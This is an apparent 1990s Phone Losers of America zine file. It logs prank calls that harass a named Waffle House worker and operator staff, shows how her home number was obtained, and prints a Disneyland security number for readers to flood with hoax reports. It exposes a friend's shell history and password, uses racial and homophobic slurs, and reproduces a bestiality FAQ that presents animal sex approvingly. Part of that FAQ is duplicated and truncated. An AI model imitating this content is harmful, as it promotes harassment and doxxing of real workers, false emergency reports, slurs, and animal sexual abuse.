__ _____________. __________. . . . ............................ _\/_ _\________ /| oF __\______ | pHONE lOSERS oF aMERICA :... \/\// ______/ |___/__ ___/ | �: hP!/ | | l / \/ | "Who are these people and why do they : /________l |__________/________.__l hate me?? What did I do?" - J. Heggie : . . .........................................................................: Here it is kiddies. What you have been waiting for. The gnu PLA and guess what. It isn't written by that looser redb0xchillipepper mainly because i felt like fucking writing. If you have a problem with it then go and harass some one because i really don't care. So without further adieu here is the lamest PLA to date(well mabey that one about hacking bbs's was gayer). Oh and the reason this is pla099.txt is just because i wanted to confuse you and make your little puny brain hurt. -Dr. Hate |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |The Granite City Waffle House Harassment(just unprovoked good harassment) |______________________________________________________________________________ Granite City Waffle House Yea what kind of waffle's do you guys have? Regular and pecan waffle's sir. What's the difference? One has Pecan nuts and the other doesn't How much is a pecan waffle? $1.75 sir $1.75 for a fucking waffle!!? yes sir one pecan waffle is $1.75 that better be one big fucking waffle It's slighty larger then a regular waffle sir you guys don't put bourbon or anything like that in it? Nope, just pecans sir. what kind of pecans? well, uh, i don't know sir. Just regular pecans i think you are charging me $1.75 and you don't know what kind of pecans are in it? mabey you should talk to the chef sir yea i think so too The cashier goes and gets linda and me and zak are just busting up laughing the whole time. hello? Hi, what kind of pecans do you put in your pecan waffles? Just run of the mill pecans you don't pay some mexican to pick them in brazil or anything? no sir, just regular pecan nuts well how do i know that the pecan nuts you are serving are sanitary? sir you have my guarantee, all of our food is clean. how do i know you didn't shoot those pecan nuts out your clit? sir i think that's kinda disgusting well i want to be sure i am getting sanitary pecan nuts. After all I am paying $1.75 for one god damn waffle sir i assure you the waffle's are clean well i don't believe you i'm sorry to hear that sir if i bring in my own pecan nuts, could you cook me up some waffles using those? sir we can't do that why the fuck not? it's against policy yea but my pecan nuts are sanitary and i don't think yours are. sir i'm sorry but you can't bring in your own nuts ARE YOU SAYING MY NUTS ARE UNSANITARY!? no sir i'm not, it's just against policy SO YOU ARE SAYING MY NUTS ARE UNSANITARY AREN'T YOU?! *sigh*, no sir i didn't say that WHY ARE MY NUTS UNSANITARY? (getting just a tad bit pissed) sir i did NOT say that, i just can't let you bring in pecan nuts SO WHY DO YOU THINK MY NUTS ARE UNSANITARY?! SIR I DIDN'T SAY YOUR FUCKING NUTS WERE UNSANITARY YOU LITTLE FUCKHEAD AND I DON'T THINK YOUR VERY FUNNY AT ALL. I DEMAND TO KNOW WHY MY NUTS ARE UNSANITARY! (Linda kinda went nuts after that. I heard a bunch of nawty werds and her yelling with other employees. She was yelling so loud me and zak heard some one tell her to shut up and then we hung up.) After a lot of calling up the waffle house and yelling "MY NUTS ARE UNSANITARY!" we finally stumbled upon linda's home fone #. Granite City Waffle House is linda working? No she isn't sir Damn! Do you know when the next time she will be working? not for another two days oh great, i need to get ahold of her very badly and all i have is her work number. would you like her home fone # sir? (FUCK WOULD I!) If you could give it to me it would be appreciated no problem, just don't tell any one i gave it to you Don't worry i won't And that's how we got her home fone #. Easy wasn't it. So we called her up at home and got this really cool guy. Hello? is linda home? yes just a second hello Hi linda i was calling in regards to why YOU THINK MY NUTS ARE UNSANITARY! Fuck off asshole, you little cock sucker(linda went more berserk this time then the first time) I KNOW ABOUT YOU GUYS, IF YOU DON'T LEAVE MY WIFE ALONE I'M GONNA KICK YOUR ASS oh is that so pecan boy yea you think you are so funny, why don't you come down here and see how funny you really are was that a physical threat pecan boy? GOD DAMN RIGHT IT WAS you're so sexy when you're mad cupcake Oh you just laugh now funny boy, when i find you you're gonna wish you never got a fone! oh is that so? leave my wife alone! The next day they changed their number. I think that's a record. Even Glen Danzig let us call him twice. Well after awhile they said that linda didn't work there any more until one night i tricked them a good one! Granite City Waffle House can i speak to linda please She doesn't work here any more tell her this is her husband Oh! hold on one moment(you can here linda yelling about why am i calling so late in the background) she want's to know why you are calling so late it's an emergency OH! hello? HEY PECAN BITCH, WHY ARE MY NUTS UNSANITARY? fuck you little punk tricked you a good one didn't i? (once again she went berserk and we hung up the fone to her yelling at the top of her lungs) I'm gonna be moving up to Illinois soon and the first place i'm going is the waffle house so i can harass linda in person. So be expecting another file on linda! |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |Recently my account was taken away from me because of reasons beyond my |control but Zak was nice enough to let me use his account and this is |what i found after he tried so hard to delete all evidence of his social |devience. These are his .bash_history and his .newsrc |_________________________________________________________________________ who ;zak is looking for gurls to pimp! talk apok0lyp ttyp1 ;guess he found one and her name is bob! who talk apok0lyp@mtvernon1.basenet.net ;i have a feeling they were talking about ; felching menu ;zak misses his good old windows gui i guess who ;still checking out the chicks exit ;self explanitory ls ;looking for porn! rm *.jpg ;found old porn and deleted rm *.gif ;there is nothing worst then old porn ls menu ;zak needs his menu so he can irc! irc el_jefe irc.mo.net ;he's gonna go get some cybersex now! ls ls ls ;i guess he covered his eyes the first two times he did an ls irc el_jefe irc.texas.net ;gonna go get some gnu gifs from #felch! e ;zak has that twitching problem and stuff ln menu menu exit menu dir ;zak you dos hacker! menu dir ;uhm exit menu menu dir ;kinda redundant isn't it menu rz ;u/l porn! dir ;zak's kinda slow on figuring out that dir don't work in unix menu dir ;i think my dog has figured out that dir don't work in unix by now sz mom10.gif jporshe.jpg preg-10.jpg ;for some odd reason i doubt jporshe.jpg ; is about a car! rz dir ;oh my lord rm mom10.jpg ;deleting the porn so no one will know he's a wierdo rm mom10.gif ;GO AWAY PORN! rm preg-10.jpg dir rm jporshe.jpg ftp ;more porn any one? menu menu dir ; FOR CHRIST'S SAKE ZAK STOP USING DIR rm morhot.jpg ;come to ur own conclusion on what this is rm morhot.gif ;i don't think zak has figured out wildcards yet rm guesswho.jpg ;P0RN! rm daisy2.gif ;P0RN! rm asia1.jpg ;damn zak must go through vaseline like gerbils dir sz *.gif *.jpg ;now zak figures out how to use wildcards rm *.gif ;getting rid of the 0-DaY p0rn rm *.jpg dir exit exit dir menu menu dir sz *.jpg *.gif rm *.jpg dir rm *.gif ;zak kinda does the same thing alot don't he? dir exit menu ftp menu menu exit 3xit ;notice the 3, he's still in kR4D m0d3! exit exit menu cd News;checking out the 0-DaY in the p0rn newsgroups ls sz *.gif menu ls rm * ;0H N0 TH3 W4R3Z 4R3 G0HN3! cd .. ls pico hank ;i have no clue what this is but i'll find out ls type ;still in d0s m0de type pla.irc ;l00k it's the famed pla.irc ls exit menu ls cd News ;need i say more p0rn? ls cd .. menu menu menu menu menu k ;evidence of zak's twitch menu /menu menu menu ;just can't get enough of that ascii menu exit menu ls menu ls menu ls pico .rhosts ;hey what's this! rm .rhosts ;i better rm it! type pla.irc ;there's that pla.irc thingie again ls pico pla.irc ;tsk tsk every one knows you are supposed to use vi zak ls fg ping basenet.net ;ping fludz! ping niggah.org ;zak is a secret nazi! ping niggah.com ;ditto ping oia.net ;uh getting kinda excessive with that ping command nslookup ;l00king for sites with p0rn fg ls cd .. cd eyers dir cd .. dir cd apok0lyp ;let's steal his warez! ls ls ls -la cd .. cd blinddog bye exit menu exit dir get ;getting p0rn probably involving felching and pigs rm hank ;destroying the evidence sz phoenix.* ;why the fuck would any one d/l phoenix? dir sz phoenix.txt menu dir edit veiw man man phoenix ;haha zak is looking for them manual pages for phoenix look ;look? look phoenix.txt see ;man cat there joey /dcc ;h3y i'm n0t 0n irc but 3y3 w1ll still dcc warez! exit ls menu menu ls cd News ls sz *.gif *.jpg ;can't get enough porn ls rm * cd .. ls pubcat cat ;zak found the command! cat --help cat pla.irc ;hey it's that pla.irc script again! ls type exit pine ;"holy shit i got mail!" ls menu exit ls ;blah menu menu exit ;blah ls sz get menu ls sz pla.irc ;no clue as why he d/l this ls cd .. cd eyers ls cd mail ;blah la -la ls -la cd .. cd blinddog ;checking out his 0-DaY cd apok0lyp ls cd .. ls bye exit menu ls sz pla.irc ;uh i thought u already d/l this sz ftr **0800000000022d ;zak got flashed! sz ftr.irc ls menu ls cd news cd News ;m0re p0rn aga1n ls rm cax.jpg ;i have no idea what a cax is but i'm scared, very scared menu ls sz *.JPG ;m0re porn then you can shake a stick at sz *.jpg sz *.gif **0800000000022d **0800000000022d ;stop flashing me! **0800000000022d rm * ;bye bye p0rn cd .. ls cd .. cd fuckme ;hey now, no need to get vulgar cd paok0lyp cd apok0lyp ls cd .. cd blinddog cd .. cd deter ;looking f0r deters gifs exit menu ls cd News ls sz *.jpg sz rob* **0800000000022d **0800000000022d ;flashed yet again **0800000000022d rm * exit menu who who stb ;cruising the net! who who exit who ;he sp0tted a chick! who exit menu exit pine ;hey how come they don't say "you've got mail" any more? menu menu exit who finger eyers ;that's just fucking disgusting menu pine ls ping i1.net ;he's ping fluding again dir ;BITCH HAVEN'T YOU FIGURED OUT DIR DON'T WORK IN UNIX YET exit finger ralphc ;much more of this and i'm gonna puke ls cd .. cd eyers ls cd .. cd native ;looking for them tanned boys exit menu exit menu exit irc goon irc.mo.net ;fun irc goon irc.winternet.com ;more fun irc goon irc.texas.net ;too much fun irc goon irc.texas.net :6665 ; oh geez it ain't that hard to irc without a ;menu irc goon irc.texas.net:6665 exit passwd ;my passwd is :If3lcH4g0d exit ls\ ;twitch \ ;twitch who cd .. cd eyers ls ls -al /bye exit ls del .newsrc ;rm'ing all his pornographic evidence with dos commands rm .newsrc ;little does zak know, i have his .newsrc and it's right after ;this file ls -la ;making sure there is no p0rn for me to laugh at cd News ls cd .. ls who who who exit who who exit ;end of zak's .bash_history .newsrc alt.2600: 1-9766,9846,9848-9851,9854-9856,9860,9890,9900,9997,10198,10283 ;i guess zak likes to talk to ppl from aol and 12 year olds alt.drugs: ;notice all articles have been read alt.sex.stories: 1-4898,4920,4932-4935,4937,4997,5014,5035,5057,5075,5143,5185,5219,5277,5304,5315,5323-5325,5363 alt.sex.fetish.smoking! 1-518,525-530,533-534,556-557,560,565-566 alt.binaries.pictures.erotica.orientals: 1-4897 alt.binaries.pictures.tasteless: 1-1374,1376-1377,1395,1430,1449,1471 ;this one is actually kinda cool and makes my nipples perky alt.binaries.pictures.erotica.pornstar: 1-2826,2972 alt.binaries.pictures.erotica.black.females! 1-1412,1465-1467,1470,1531 alt.binaries.pictures.black.erotic.females! 1-1024,1109,1128-1129 alt.binaries.pictures.erotica.pornstars: 1-533 alt.binaries.pictures.nude.celebrities: 1-1653,1723,1758,1781-1782,1790 alt.sex.first-time! 1-141,160,163,166,173 ;all p0rn but there is still more alt.folklore.herbs: ;all read alt.drugs.psychedelics: ;gee wally, you think the beaver has a drug problem? alt.drugs.pot: ;don't bogart that joint! alt.sex.fat! 1-788,807 ;just fucking gross alt.sex.fetish.fa! 1-740,778,792-793,816 ;porn alt.binaries.pictures.erotica.cartoons! 1-1125,1151,1155 ;porn alt.hemp.recreational: 1-31,67 ;hey a druggie newsgroup and it still has ;articles not read! alt.binaries.pictures.erotica.redheads: 1-1326 ;firecroch! alt.binaries.pictures.erotica.latina: 1-652,686,735,738 ;beaners! alt.binaries.pictures.erotica.female.anal:769-770,796 ;my hole is still swolen! alt.binaries.pictures.lesbians: 1-1730,1748,1835-1836,1842 alt.binaries.pictures.erotica.pregnant: 1-473,521 ;uh that's just plain wierd alt.binaries.pictures.erotica.lesbians: 1-75,81 alt.binaries.pictures.dorks: 1-29;haha i think greg carson needs a gif in here alt.binaries.pictures.erotica.teen.fuck: 1-31 ;pedophile! alt.binaries.phonecards: ;K0D3Z! alt.binaries.pictures.erotica.transvestites! 1 ;rocky horror picture show alt.binaries.pictures.erotica.midgets: ;a pla favorite alt.binaries.pictures.nudism.celebrities: 1-38 ;I G0T TINA TURNER NEKID! ;end of .newsrc |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | A few nights ago me and zak were harassing people like usuall when I |came up with a brilliant idea. Lets torture OCI untill they break and |go nuts. And so it began, the harassment of OCI. |____________________________________________________________________________ This is Abe may i help you. yea, do a kick flip for me uh what was that sir? are you deformed or something? I said do a kick flip i can't do that sir Why the fuck not? You got a peg leg or something? no sir you some kind of mutant or something? no sir then do a fucking kickflip i can't sir listen here stumpy, i want you to do a flip right now or i'm gonna come down there and ram your stump up your ass! hold on while i transfer you sir THis is sherry may i help you yea i want you to say "go away pla" sir can i help you in making a call? no i want you to say "go away pla" i'm disconnecting the line, thank you for using OCI This is Abe may i help you STUMPY! How's it going you mutant bitch sir would you like to make a call hey stumpster transfer me you stumpy guy you This is sherry how can i assist you? you can assist me by giving me a hand job excuse me sir? just say "go away pla" and we go away disconnecting line This is Claris may i help you hi claris you have a lovely voice uh thank you, can i assist you in making a call i love you claris sir? i want to make mad love to you claris please hold while i transfer you This is james may i help you yea you can say "go away pla" i can't do that SAY IT BITCH disconnecting line this is abe may i help you STUMPY! THE STUMPSTER! THE STUMPOMATIC, THE STUMPMIESTER, STUMPARELLA STUMPY-1 KANOBE! please hold while i transfer you hit that transfer button with your stump! This is james may i help you you can say it bitch fuck off say it now go tell your mom she can't suck a good dick that wasn't funny there hick boy, now say it disconnecting line this is claris may i help you i love you claris sir would you like to make a call? yes i want to call you at home sir i'm transfering you don't be mad claris, i love youuuuuuuu! Hello again heh, say it and we leave you alone i ain't gonna say shit say it motherfucker so how's the defcon voice bridge? what? i know about you hackers! we are the hohocon hackers! say it bitch disconnecting line This is Carmen may i help you? Hi Carmen, could you please transfer me to your supervisor. sure, please hold carmen wants it! Hello again are you gonna say it now? nope i ain't hey jamie don't it suck not having our ani do you even know what ani stands for there james? fuck off JAMES DON'T KNOW WHAT ANI IS.. NEENER NEENER disconnecting line This is claris may i help you i want to mary you sir, would you please leave me alone but claris i love you! i want to hold you forever! transfering hello this is the oci operator how can i help you you can say "go away pla" and i will leave you alone disconnecting line This is Abe may i help you YOU ONE LEGGED FREAK OF NATURE! *sigh* doesn't it suck not being able to kill yourself because you have stumps transfering hello again heh, you gonna say it now motherfucker i got pictures of you hackers at the tropicana! uh ok now say it i was at defcon! that's nice now say "go away pla" no JAMMIE DON'T KNOW WHAT ANI IS.. NEENER NEENER disconnecting line this is claris may i help you i am madly in love with you honey sir.. don't be mad at me cupcake, i love you transferring this is angela may i help you you can say it and we will stop calling you sir i'm not going to say it and don't you have anything better to do then call us up for 2 hours straight? nope, that's what makes me a phone looser disconnecting line Me and Zak called for another hour. Poor stumpy sounded like he was seriously gonna go commit suicide and claris was just too confused about the whole situation. She almost gave me her number once. Carmen thought i was just peachy keen because i never harassed her. And poor angela kept on ansering the fone and then we finally broke her. sir please stop calling all you have to do is say those three magic words what did you want me to say? go away pla GO AWAY PLA I'M NOW DISCONNECTING THE LINE thank you, wasn't that hard was it i thought zak was gonna die he was laughing so hard and now whenever i get angela all i have to do is say "say it" and she does. One of the perks of being a phone looser) |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Awhile ago i stumbled upon DisneyLands vmb system. It was fun for a |few days but got old real quick since all they talk about is stuffed animals |and felching. So i scanned some boxes and found the number to Disneyland |security. Which was rather keen i thought. So here is a log of me and Zak |harassing the most wonderful place on earth. Oh if you want to harass |them too then just dial 714-999-4330 and remember to say that you are Roy. |___________________________________________________________________________________________________________________________________________ Disneyland security, may i help you Yea this is Roy at the tiltawhirl. It seems we have a major problem. And what is that sir? One of the tiltawhirl cups went haywire and flew off and landed on some poor old lady. I think she's dead. Oh is that so? Yes it is Sir we don't have a tiltawhirl inside the park. Stop playing on the fone. No! Disneyland Security Hi, this is Roy the janitor. What can i do for you Roy There's this guy that is making people watch him take a poo. He's what? He's making people watch him take a poo. He just grabs them and shoves their head down there and he takes a poo! Some poor old lady is tramautized. What did this man look like? He was 5'7, black hair, black eyes, and he's wearing a trenchcoat. Ok He's making people look at his poo for god's sake! Were did you spot him at? By it's a small world We'll send somebody out right now Thanks! Disneyland Security Hi uh hello we are inside the underground tunnels and you can't do anything about it! Just what are you doing down there? Urinating in the corner that's all? Yup what are you gonna do about it mister! You aren't terrorists or anything? Nope, i'm just a fone loozer! Can you hold for a moment? Sure, i'll give you some time to pull my ani ... Sir, you're not calling from inside the park It sure looks like i am well you aren't and just how do you know that? because it says so right here Well read off my ani then i don't have that yet but if you wait 10 more seconds i will 10! 9! 8! 7! 6! 5! 4! 3! 2! Disneyland Security Yea this is Roy at the castle, some guy is sitting on top of the castle and throwing spam at passerby's! He almost got me that time! Are you serious? Oh quite serious. OH SHIT HE JUST KNOCKED OUT A KID WITH SPAM! i think you better do something quick. what do you suggest? Can you bring out the helicopters and scuba divers? don't forget the ninja's! why would we need all that? Because the guy is dangerous! Well just keep on talking to us guys why's that? so we can get your fone number why would you want that? so he can molest us! just keep on talking funny guys |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |D0uds, these are two of the most ueber faqs i have found in my whole |life. They are so elite Mitnick himself would be proud. So read them if |you have the time and read them if you don't. These faqs just plain rool. |____________________________________________________________________________ **************************************************************************** #BEASTSEX/#DOGSEX FAQ Last Updated: November 7th, 1995 by ChicknPie **************************************************************************** ============================================================================ PART 1: INTRODUCTION ============================================================================ This FAQ is made available to answer some of the most common questions about zoophilia. If you have any other questions, do not hesitate to ask someone. Please note that the bulk of this FAQ is borrowed from the ASB FAQ. I've also changed some of the sections which did not apply to IRC. The ASB FAQ is also a good resource, as it covers a number of topics that are not covered here. The ASB FAQ is avaiable from a number of places, including: - WWW: One of several Zoo pages (Try doing a web search on Bestiality or Zoophile) - NEWS: This FAQ is supposed to be posted to alt.sex.bestiality once or twice a month. - EMAIL: kayotae@phantom.com Thanks in advance for reading this, and more importantly, for your interest. (DISCLAIMER) This document is by no means complete. The purpose of this document is to discuss some of the common questions and answers. Answers to questions of legality, etc must be found elsewhere. No one can be held responsible for any actions you take after reading this FAQ. Period. Use common sence, and don't break and laws (trespassing/etc) and you should be OK. ============================================================================ 1 - What is bestiality? Zoophilia? ============================================================================ Bestiality is, by textbook definition, sexual contact between a human being and a non-human animal. Zoophilia is, by textbook definition, an emotional attachment to an animal that causes a human being to prefer a non-human animal as a companion and / or a sexual partner. These definitions are generally accepted around here :) Many zoophiles have extremely close, emotional relationships with their non-human partners and many bestialists enjoy the pleasure they can give and receive from their lovers. ============================================================================ 2 - Why is #dogsex and #beastsex here? ============================================================================ #beastsex (abv #BS) and #dogsex (abv #DS) is a permanent channel, meaning it's there any time of day, and time of the week. The primary topic of discussion is zoophila, but we talk about just about anything. Most of the channel regulars are active zoos (short for zoophiles), but non-active zoos and non-zoos are welcomed as well. We're happy to answer any questions related to inter-species relationships. There are a couple of things that #DS and #BS are *NOT* for: - No Netsex (Cybersex, etc..) - No Flames - No Picture Trading/Begging (try #sexpics instead) Just remember the basic rules of ediquette apply, and you'll do alright. :) Thanks. ============================================================================ 3 - Do people on this channel actually have sexual relations with animals? ============================================================================ Of course! There are also many here who have not had sexual relationships with animals but are interested or have questions related to it. ============================================================================ 4 - How many people have sex with animals? ============================================================================ [ This section written by Redvane Fox (redvane@atheling.demon.co.uk) ] There have been various studies but to my mind they are all flawed or dated. The most famous is that of Alfred Kinsey et al in the late 40's / early 50's USA which reported that 8 percent of men and 3.5 percent of women had "on some occasion, had sexual contact with an animal." In some rural areas, the figures for males were as high as 50 percent. However, this was a time when the chances of a 16-year-old farmer's son getting a human partner to do more than hold hands was virtually nil. Thus, animal contacts would have been more common then than now. Also, given the decline of farming in America and Europe and the increasing urbanisation of populations, I would venture a guess that there are somewhere in the region of 2 to 4 percent of men have had some sort of sexual experience with a non-human. Masters and Johnson reported less than 2 percent of women had sexual contact with an animal (dogs mainly) but others have estimated that the true figure was probably higher (let's face it, if someone comes up to you and asks "Do you fuck animals?" would you give them a straight answer?) It's also important to know that for very many people who do have sex with a non-human in, say, adolescence, they don't carry it on into adulthood - it's a teenage experiment, part of exploring the wonderful world of sex. Two of my friends have (over much beer) admitted to me that they've "played around" with animals when they were teenagers but went on to have "normal" hetero partnerships (although they both said they had no regrets and might try it again if the circumstances were right). Of people who have had sex with animals once, liked it and stayed or those whose attraction to animals was there from the very beginning is perhaps less than 0.1 percent of the population. To quote Midas Dekker's "Dearest Pet": "Earlier in this chapter I estimated the percentage of human beings that have sexual experiences with animals at a few percent. If you include in bestiality only the people who have sex *exclusively* with animals then the percentage falls far below 1 percent. Bestiality requires imagination and people with imagination usually have no flies on them. On the other hand, if you drop the requirement that for sexual contact something has to be inserted somewhere and that something has to be fiddled with and it is sufficient simply to cuddle, to derive a warm feeling from each other, to kiss perhaps at times, in brief to love, then bestiality is not a deviation but the general rule, not even shameful, but the *done thing*. After all, who does not wish to be called an animal lover?" ============================================================================ 5 - Can I make my animal pregnant by having sex with her? ============================================================================ Absolutely not. Because of things like chromosome counts, body temperatures and genetic codes, human animals cannot impregnate other animals. However, if you do wind up impregnating your lover, call me immediately! I could make, err, make you, a bundle selling your story to the tabloids! ============================================================================ 6 - Isn't sex with animals unethical? Blasphemous? Cruel? ============================================================================ Cruel treatment of animals is one of the few c ============================================================================ 5 - Can I make my animal pregnant by having sex with her? ============================================================================ Absolutely not. Because of things like chromosome counts, body temperatures and genetic codes, human animals cannot impregnate other animals. However, if you do wind up impregnating your lover, call me immediately! I could make, err, make you, a bundle selling your story to the tabloids! ============================================================================ 10 - Where can I find "How To" information ============================================================================ We finally have a 'how to' section of the FAQ! Okay, it's mostly my fault for just not editing the stuff I've had wasting away on my hard drive for the last couple of weeks but, contrary to popular belief, my entire life does -not- revolve around this place :> Anyhow, for how to info, refer to 'How to; Equines.' 'How to; Canines' will be a regular part of this FAQ by the first of next month. If you would like to contribute your own knowledge about the critter of your affections, please write me to express your interest! ============================================================================ PART 2: Zoophilia and your Health ============================================================================ =========================================================== Herpes, gonorrhea, genital warts, and syphiliis, four of the most common sexually transmitted diseases in the world, are all diseases which are limited to contraction and transmission by humans. However, it has been theorized that if a man with a venereal disease were to have sex with an animal, without the use of a condom, and then another man were to have sex with that same animal immediately or soon after, that if semen or blood from the first man were absorbed into the blood stream of the second man, he may contract a venereal disease. ====================================== 1 - Auto-Immune Deficiency Syndrome, (AIDS) - --------------------------------------- Presently, it is not known for sure if Auto-Immune Deficiency Syndrome can be passed between a human and a non-human animal through sexual intercourse. According to the American Veterinary Medical Association, Feline Infectious Virus, the alleged pre-cursor to Feline AIDS and equivalent to Human Infectious Virus, (HIV), is not transmittable between felines and non-feline animals. 2 - Lyme Disease - ------------ [ This section written by MegaDog (megadog@dogstar.win-uk.net) ] Lyme is a disease of humans, dogs, cows, cats, horses, deer and goats, caused by a Spirochete bacterium, Borrelia bergdorferi. It was first recognised in the mid-1970's and has been recorded in the USA, Europe, Central/South America, Japan, the CIS [ex-USSR] and Africa. Normally, the disease is spread by bites from ticks [Deer tick, Black-legged tick and Lone-star tick], though fleas have also been implicated, as have Dog-ticks. Hunters who handle or come into contact with the blood or hides of infected deer can become infected; the Borrelia spirochete has been identified in semen and urine of animals, and there are indications that it may also be present in saliva. Infection of the fetus via the placenta has been recorded in both humans and animals. **Sexual transmission of the disease between humans, or between humans **and animals, has not *as yet* been conclusively proved, or disproved! However Borrelia is a Spirochete bacterium, as is Treponema pallidum, the causative organism of syphilis. **You are left to draw your own conclusions as to the *possibility* that **Lyme may be transmitted sexually. Symptoms: Humans ~~~~~~~~~~~~~~~~ These vary. In the case of infection by tick bites, around half the cases show a rash [called erythema migrans] at the point of bite; this can be confused with other allergies, rashes, chemical or biological burns etc, or may go unnoticed if it is on one of the less visible parts of the body. When the infection is contracted in other ways, the characteristic bite-site signs may be absent. Other symptoms resemble flu, and may include:- headache, sore throat, fever, muscle ache or tenderness, tiredness, insomnia and joint soreness. Left untreated, these symptoms generally disappear; chronic Borrelosis may take months or years to develop, and may result in meningitis, muscle pain, arthritis, numbness, tingling and burning sensations in the limbs, testicular discomfort, facial paralysis [Bell's Palsy], fatigue, lassitude and depression. The heart, eye, reproductive, respiratory system and gastrointestinal tract may become involved. In this form, the disease may persist for many years, with periods of remission. Symptoms: Animals ~~~~~~~~~~~~~~~~~ The rash is rarely seen, being concealed by fur. Symptoms include fever, arthritis, lameness, soreness, listlessness, loss of appetite [with consequent weight loss and loss of condition], and swollen joints. The involvement of major organs or systems is the same as for humans. The disease may impair reproduction, resulting in sterility, abortion or stillbirth. In some cases the pain experienced may result in irritability or behavioural changes, such as a reduction in tractability of horses. Again, as for humans, the symptoms may be persistent, or show periods of remission of varying lengths. Diagnosis ~~~~~~~~~ The diagnosis of Lyme borrelosis is problematic; as of July 1994, there is no definitively accurate test for the disease; Repeated tests of blood from the same individual may show alternating positive and negative Lyme status. Diagnosis is largely based on the clinical symptoms, the patient's history, and by eliminating other possible causes of the symptoms. Treatment ~~~~~~~~~ Antibiotics such as amoxycillin generally provide successful treatment in humans; success depends on how soon after infection the treatment begins. Once the later stages of the disease are seen, persistent repeated courses of medication may be necessary, with no guarantee of success; once treatment is apparently complete, relapses may occur. **CONSULT YOUR PHYSICIAN/VETERINARIAN FOR ADVICE IF YOU SUSPECT YOU OR YOUR **ANIMALS MAY HAVE CONTRACTED LYME. DO NOT ATTEMPT SELF-MEDICATION! At present, there have been no reports of the evolution of antibiotic- resistant strains of Lyme. Risk Reduction ~~~~~~~~~~~~~~ Try to avoid yourself, or your animals, getting bitten by ticks. If you have visited areas where ticks are present, you should check yourself and your animals. This may take some time, but the longer an infected tick remains attached, the greater the chance of Lyme infection being passed. Check daily for ticks; favorite sites are round the eyes and ears, between the toes, on the back of the neck, and in the groin/armpit regions. Ticks may wander around the body for some time [hours, days] before settling on a bite site, they may also remain hidden on clothing, in animal bedding etc. If you find ticks, the best way to remove them is using a pair of tick forceps; these can be bought for a few $ at most pet/animal stores, and are designed to pull the whole tick out, including the mouthparts. Trying to pull a tick out using your fingers is *not* recommended; you will squeeze the body of the tick, which can inject infected blood from the tick back into the bloodstream. Other ways of removing ticks, involving alcohol, cigarettes, salt water etc. are not recommended. Record the location of bite sites, and examine them periodically for some days, in order to spot any signs of the characteristic Lyme-disease rash. Keep the ticks for identification. If Lyme symptoms develop, it may be necessary to identify the species of tick involved. Either place them in a small container with some alcohol, or trap them between two layers of clear adhesive tape. Understand, and be able to recognise, the symptoms of first-stage infection both in humans and animals. If your animals show symptoms, as well as consulting a veterinarian, you should consult a physician. The reverse also applies; if you show symptoms, inform your vet and get your animals checked. Avoid, as far as possible, contact with or exchange of body fluids [urine, blood, semen, saliva] between animals or humans that are, or may be, infected. This is particularly important if you have any cuts, grazes or other injuries to parts of your body that may come into contact with the other person/animal's body fluids. Adopt "safer sex" practises; Remember there may also be invisible internal damage to mucous membranes of the mouth, anus, vagina or penis/urethra, all of which can provide possible paths for infection by a wide range of sexually transmissible diseases. More Information ~~~~~~~~~~~~~~~~ If you have access to an Internet 'Gopher' you can access further information by searching on 'lyme', 'borrelosis' or 'borrelia'. Additional information can be obtained from state health departments, veterinarians, physicians, or the Lyme Disease Foundation, Inc. [P.O. Box 462, Tolland, Connecticut 06084]. There is also an electronic mail digest called 'The LymeNet Newsletter', where current research is discussed. To receive this automatically, you should send e-mail as follows:- To: listserv@lehigh.edu Subject: (leave this blank......) The first [and only] line of your e-mail should contain the text:- subscribe lymenet-l {Do not send a signature file on your message; the listserver may barf!} Summary ~~~~~~~ There is little if any authoritative information on whether Lyme can be transmitted by sex. Conflicting opinions abound, definitive answers are few! Understand the nature of the disease, and the possibilities for transmission, then make an informed decision for yourself, and take risk-reducing steps where you think necessary. 3 - Toxoplasma - ---------- [ This section compiled by Equuinox, (equuinox@worf.netins.net) ] From _Foundations of Parasitology_ (Schmidt/Roberts 1989) Toxoplasma is an intracellular parasite of many kinds of tissues, including muscle and intestinal epithelium...Oocysts appear in the cats feces from 3 to 5 days after infection by cysts. The most common symptoms of acute toxoplasmosis is painful, swollen lymph glands in the cervical, supraclavicular, and inguinal regions. This symptom may be associated with fever, headache, muscle pain, anemia, and sometimes lung complications. This syndrome can be mistaken easily for the flu. Acute infection can, although rarely does, cause death...In the immunocompetent person T. gondii ordinarily is kept at bay by cell-mediated immunity...Presently T. gondii is a serious opportunistic infection in AIDS. The most tragic form of this disease is congenital toxoplasmosis. If a mother contracts acute toxoplasmosis at the time of her child's conception or during pregnancy, the organisms will often infect her developing fetus. Fortunately, most neonatal infections are asymptomatic, but a significant number cause death or disability to newborns...The transmission rate to the fetus from a maternal infection is about 45%. Of those infected, about 60% will be subclinical, 9% may die, and 30% may suffer severe damage such as hydrocephalus, intracerebral calcification, retinochoroiditis, and mental retardation. Feral and domestic cats will continue to be a source of infections in humans...Any cat, no matter how well fed and protected, may be passing oocysts of Toxoplasma, although for only a few days after infection. The possibilities are particularly alarming if someone in the house becomes pregnant. Certainly, a woman who knows she is pregnant should never empty the litterbox or clean up after the cat's occasional indiscretion. Also, because children's sandboxes become a haven for neighborhood cats, they should have tightly-fitting covers. This will also protect children from larva migrans from hookworm and ascaridoid juveniles...Pyrimethamine and sulfonamides given together are widely used drugs against Toxoplasma. 4 - Urinary Tract Infections, (UTIs) -------------------------------- Urinary Tract Infections are caused by gram negative bacteria which may be found in the vagina of female animals. GN Bacteria are known to cause yeast infections, metritis, and pyometria in female animals and can lead to cystitis, urethritis, or pyelonephritis in human males. Symptoms of a UTI include frequent urination, pain when urinating, and blood and/or pus in ones' urine. UTIs may be contracted when having sex with a female animal in or out of season though they are more likely to cause a UTI when in season because of the hospitability of the female reproductive system to bacteria during this time. UTIs are easily cured with antibiotics. 5 - Canine 